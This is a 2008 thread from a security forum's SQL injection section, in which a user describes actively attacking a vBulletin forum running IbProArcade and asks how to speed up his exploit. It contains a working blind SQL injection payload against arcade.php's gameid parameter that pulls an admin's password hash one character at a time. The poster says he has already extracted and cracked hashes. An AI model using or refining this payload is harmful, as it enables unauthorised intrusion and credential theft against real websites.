|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 68
Members: 0
Total: 68
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[HELP NEEDED!] vBulletin & IbProArcade Exploit |
|
Posted: Mon Nov 24, 2008 5:38 am |
|
|
tehhunter |
Valuable expert |
|
|
Joined: Nov 19, 2008 |
Posts: 261 |
|
|
|
|
|
|
|
Hey all,
I'm currently trying to exploit a vbulletin forum that runs IbProArcade. I know my exploit works fine, but I want to be able to speed it up. Currently I am retrieving one char of the MD5'd password at a time and that in itself takes about 4-5 queries per char, and then I also must grab the salt.
So anyway, I am looking for someone to help me 'open up' this exploit:
Code: |
//I should mention that the site escapes quotes so I have to convert the
//MD5 password's char to ascii
//Therefore all chars I get must be between 48-57 (0-9) and 97-102 (a-f)
//This query asks if the char is a letter or a number (true=number)
arcade.php?do=stats&gameid=(SELECT IF(ASCII(SUBSTRING(password FROM 1 FOR 1))<97,1,2) FROM user WHERE userid=1)
//The condition then gets changed to <53, or =48, yadda yadda
//To find out if the response is true, if you get the same page as
arcade.php?do=stats&gameid=1
//it is true
//If you get
arcade.php?do=stats&gameid=2
//it is false |
So I did this for all the chars to extract my hashes and crack them. I'm looking for a way to speed it up. I've tried converting the hash and thus making errors appear, but to no avail. Any hints?
Making error pages show up is easy as pie, but I just can't open this anymore. Thanks for any help! |
|
|
|
|
|
|
|
|
Posted: Mon Nov 24, 2008 5:23 pm |
|
|
_mranderson_ |
Valuable expert |
|
|
Joined: Oct 30, 2008 |
Posts: 51 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|